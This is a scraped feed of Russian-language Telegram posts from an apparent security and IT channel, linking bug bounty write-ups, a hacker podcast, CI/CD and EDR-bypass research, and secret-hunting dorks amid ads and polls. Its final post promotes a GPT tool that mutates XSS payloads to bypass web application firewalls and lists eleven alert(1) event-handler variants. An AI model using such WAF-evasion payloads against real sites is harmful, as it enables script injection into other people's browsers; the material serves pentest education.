Обзор двух RCE, path traversal и memory leak от канала Bug Bounty Reports Explained. Кратко, ёмко и по делу👇
👀 Смотреть
#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Устраивает ли вас ваша зарплата?
Anonymous Poll
11%
Более чем
40%
Нет, не устраивает
19%
— Вот возьми, твоя зарплата. — Это же ветка?!
1%
Свой вариант (напишу в комментариях)
29%
Посмотреть результаты
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
🌚1
Из нового выпуска вы узнаете об интересном мире уязвимостей и пути Антона в ИБ-индустрии. Bo0oM — КМС по вольной борьбе с уязвимостями и владелец черного пояса в мастерстве кидания кавычек.
⏱️ Таймкоды:
01:54 Антон или Дима?
04:32 С чего начинался интерес к секьюрити
06:26 Первый взлом на игре resident evil
08:36 Хотел ли стать реверсером или хардварщиком?
10:55 Спуфинг вайфая на секьюрити конференции для исследования
12:56 Как попал в Onsec и знакомство с Иваном
19:05 Откуда шло развитие и мотивация
22:30 Багхантинг и не материальные бенифиты
28:49 Материальные бенифиты и максимальные выплаты на багхантинге
33:35 Обратная сторона исследований и угрозы
35:30 История с МТС и шуточным сообщением на забытом поддомене
40:35 Подход для выбора цели исследования
42:10 Взлом платформы для разблокировки украденных устройств
49:55 Перво место на хакатоне и премия мэра на 1 миллион рублей
1:00:33 «Стартапы» Антона и сложности предпринимательства
1:11:30 Судьба Взрывного блога
1:16:13 Как сохранять мотивацию и интерес к работе за такой большой промежуток времени
1:18:51 Повлияла ли работа на личную жизнь
1:21:08 Влияние AI на индустрию
1:23:58 Способ оставаться в трендах и оставаться в курсе тенденций и угроз индустрии
#podcasts
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2🔥1🥰1
Практические ресурсы для исследования безопасности CI/CD:
🧠 Техники
🛠️ Инструменты нападения
🗒️ Тематические исследования
👉 GitHub
#tips #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
💬 Что не так с этим кодом? Каким багам он подвержен? Свои ответы пишите в комментарии👇
#вопросы_для_самопроверки
#вопросы_для_самопроверки
👍2
Подписывайтесь на наш новый канал про нейросети для создания изображений, там есть:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2
Forwarded from Proglib.academy | IT-курсы
💵 ТОП-15 самых востребованных профессий в ИТ: куда все катится в 2024 году
Мы часто обсуждаем зарплаты айтишников в России. Однако не стоит забывать про США, ведь это страна — мечта для многих программистов. В этой статье расскажем, сколько зарабатывают айтишники в США.
Вкатываться в айти в 2024 году однозначно стоит. Только в США базовые зарплаты всех ИТ-специалистов в США выросли на 2,6%, — спрос на квалифицированных ИТ-специалистов остаётся высоким.
🔗 Читать статью
🔗 Зеркало
Мы часто обсуждаем зарплаты айтишников в России. Однако не стоит забывать про США, ведь это страна — мечта для многих программистов. В этой статье расскажем, сколько зарабатывают айтишники в США.
Вкатываться в айти в 2024 году однозначно стоит. Только в США базовые зарплаты всех ИТ-специалистов в США выросли на 2,6%, — спрос на квалифицированных ИТ-специалистов остаётся высоким.
🔗 Читать статью
🔗 Зеркало
❤1
EDR на macOS и Linux? Никто не думает об этом в ходе редтима или пентеста. Но данное средство защиты можно встретить не только на Windows.
Приведенный ресёрч рассказывает об обходе EDR в macOS/Linux и освещает возможности/недостатки EDR.
👉 Читать
#pentest #redteam #research
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Мы наконец-то запустили канал по разработке игр — теперь все самое важное и полезное из мира геймдева можно узнать в одном месте.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Вы начинающий пентестер и не знаете с чего начать, когда имеете дело с большой инфраструктурой?
Автор канала NahamSec делится опытом сканирования большой инфраструктуры на предмет одной и той же ошибки с использованием инструментов от ProjectDiscovery, meg от TomNomNom и платформы Trickest. Маст-хэв для этичного хакера👇
📺 Смотреть
#bugbounty #pentest #tools
Автор канала NahamSec делится опытом сканирования большой инфраструктуры на предмет одной и той же ошибки с использованием инструментов от ProjectDiscovery, meg от TomNomNom и платформы Trickest. Маст-хэв для этичного хакера👇
📺 Смотреть
#bugbounty #pentest #tools
👍2🔥2🌚1
This media is not supported in your browser
VIEW IN TELEGRAM
🧰 У каждого багхантера под рукой всегда есть любимые инструменты, которые он использует на постоянной основе. Reflector — хоть и старое расширение для BurpSuite, но оно точно заслуживает, чтобы вы добавили его в свой список инструментов.
🤑 Это простое в использовании расширение, которое поможет найти «отражения» и, в конечном итоге, протестировать их на наличие XSS.
👉 GitHub
#tools #tips #bugbounty #pentest
🤑 Это простое в использовании расширение, которое поможет найти «отражения» и, в конечном итоге, протестировать их на наличие XSS.
👉 GitHub
#tools #tips #bugbounty #pentest
👍4
🥷 Десериализация VIEWSTATE: как обнаружить и реагировать на атаки
Под катом — результаты анализа кибератаки азиатской группировки с «недозакрытой уязвимостью» от команды Солар.
👉 Читать
#pentest #redteam #incedentresponse
Под катом — результаты анализа кибератаки азиатской группировки с «недозакрытой уязвимостью» от команды Солар.
👉 Читать
#pentest #redteam #incedentresponse
🥷🔍 Полезные GitHub-дорки и инструменты для автоматизации поиска секретов: на заметку этичному хакеру
#cheatsheet #bugbounty #pentest #recon #tools
#cheatsheet #bugbounty #pentest #recon #tools
🔥6👍1
Proglib запускает канал Азбука айтишника
Подписывайтесь на наш новый канал про айти для неайтишников — для совсем новичков и тех, кто постоянно взаимодействует с айтишниками.
У нас есть рубрики:
⭐ База — в ней рассказываем про термины из IT простым языком
⭐ Проект — объясняем, из чего состоят айтишные проекты и сколько они могут стоить
⭐ Психология айтишника — тут говорим про софт-скиллы, особенности работы и взаимодействия
👉Подписывайтесь!
Подписывайтесь на наш новый канал про айти для неайтишников — для совсем новичков и тех, кто постоянно взаимодействует с айтишниками.
У нас есть рубрики:
👉Подписывайтесь!
Please open Telegram to view this post
VIEW IN TELEGRAM
Автор статьи Sergei Vorniches прошел через фриланс, стажировки, корпорации, смену профессии и даже запуск собственного SaaS'а. Очевидно, что за это время он получил много как позитивного, так и негативного опыта. В статье он описывает 5 важных уроков, которые хотел получить 10 лет назад.
💬 Какие из них лично для вас являются наиболее важными в профессии айтишника? Цифру пишите в комментарии👇
💬 Какие из них лично для вас являются наиболее важными в профессии айтишника? Цифру пишите в комментарии👇
🔥3
✍️Библиотека программиста» находится в поиске автора оригинальных статей
Кто нужен?
● Энтузиасты (джуны и выше), которые держат руку на пульсе, читают помимо книг зарубежные техноблоги
● Энтузиасты, которым есть что сказать
Тематика
● DevOps
● В четырех случаях из пяти вы предлагаете тему статьи
Объем
● От 7 до 15 тыс. знаков без учета кода
● 2-3 статьи в месяц
Оплата
● 8к руб. за статью
● Работаем с самозанятыми (компенсируем налог), ИП
Я пишу «так себе», что делать?
Чтобы написать статью, которую не стыдно опубликовать, достаточно овладеть инфостилем. У нас есть бесплатный курс для начинающих копирайтеров «Статьи для IT: как объяснять и распространять значимые идеи». Время прохождения курса: 1-2 недели.
✉️Пишите на hello@proglib.io
Кто нужен?
● Энтузиасты (джуны и выше), которые держат руку на пульсе, читают помимо книг зарубежные техноблоги
● Энтузиасты, которым есть что сказать
Тематика
● DevOps
● В четырех случаях из пяти вы предлагаете тему статьи
Объем
● От 7 до 15 тыс. знаков без учета кода
● 2-3 статьи в месяц
Оплата
● 8к руб. за статью
● Работаем с самозанятыми (компенсируем налог), ИП
Я пишу «так себе», что делать?
Чтобы написать статью, которую не стыдно опубликовать, достаточно овладеть инфостилем. У нас есть бесплатный курс для начинающих копирайтеров «Статьи для IT: как объяснять и распространять значимые идеи». Время прохождения курса: 1-2 недели.
✉️Пишите на hello@proglib.io
Stepik: online education
Статьи для IT: как объяснять и распространять значимые идеи
Для тех, кто любит качественные IT-публикации и хочет научиться интересно писать о программировании и собственных IT-проектах
👍2❤1
🤖 XSS Mutation Engine — GPT от jhaddix и Arcanum Information Security, который возьмет стандартную строку атаки и применит мутации для обхода WAF.
Самый простой пример: код для эксплуатации выглядит следующим образом👇
... но любую попытку эксплуатации блокирует WAF. Просто отправьте этот пэйлоад боту, чтобы получить на выходе это👇
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
Самый простой пример: код для эксплуатации выглядит следующим образом👇
<a href="#" onclick="alert(1)">Click me</a>
... но любую попытку эксплуатации блокирует WAF. Просто отправьте этот пэйлоад боту, чтобы получить на выходе это👇
1.
<a href="#" onload="alert(1)">Click me</a>
2.
<a href="#" onmouseover="alert(1)">Click me</a>
3.
<a href="#" onfocus="alert(1)">Click me</a>
4.
<a href="#" onerror="alert(1)">Click me</a>
5.
<a href="#" onscroll="alert(1)">Click me</a>
6.
<a href="#" onkeydown="alert(1)">Click me</a>
7.
<a href="#" onkeyup="alert(1)">Click me</a>
8.
<a href="#" onblur="alert(1)">Click me</a>
9.
<a href="#" onmouseout="alert(1)">Click me</a>
10.
<a href="#" ondblclick="alert(1)">Click me</a>
11.
<a href="#" onmouseenter="alert(1)">Click me</a>
👍5🔥2🥰1